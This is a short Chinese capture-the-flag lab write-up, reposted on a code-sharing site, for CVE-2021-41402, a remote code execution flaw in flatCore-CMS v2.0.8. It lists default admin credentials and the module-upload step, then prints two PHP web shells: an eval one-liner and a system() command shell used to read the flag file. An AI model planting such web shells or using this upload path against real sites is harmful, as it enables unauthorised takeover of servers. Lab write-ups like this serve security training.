春秋云境:CVE-2021-41402(flatCore-CMS v2.0.8 RCE)

企业开发 2023-10-01 18:21:24 阅读次数: 0

目录

一、题目

1.一句话木马:

2.命令执行木马:

一、题目

靶标介绍:

flatCore-CMS v2.0.8 存在后台任意代码执行漏洞

进入题目:

 robots.txt目录:

/acp后台: 

 admin/12345678

“Addons”-- “Installieren”上传新模块

 

1.一句话木马:

 

<?php @eval($_POST['cmd']);?>

 蚁剑连接:

https://xxx.ichunqiu.com/upload/plugins/xxx.php

 查看flag:

 

 flag{a3b6c217-ec07-4f4b-9e4c-90580144fdd0}

2.命令执行木马:

<?php system($_GET[1]);phpinfo();?>

 

  http://xxx.ichunqiu.com/upload/plugins/system.php?1=cat ///flag

  flag{a3b6c217-ec07-4f4b-9e4c-90580144fdd0}

猜你喜欢

转载自blog.csdn.net/m0_65712192/article/details/132421714
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
周排行
购置笔记本常识
从源码看Spring Security之采坑笔记(Spring Boot篇)
大数据学习——高可用配置案例
如何避免选择不专业的建站公司?
Euclid's Game HDU - 1525(博弈)
面试笔记(六)---Js实现eventHandler
Windows 实例搭建的 FTP 在外网无法连接和访问
设计模式 : 桥接模式
USB 设备驱动开发之几个重要结构体分析
14-p14_sqrt求平方根
每日归档
更多
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022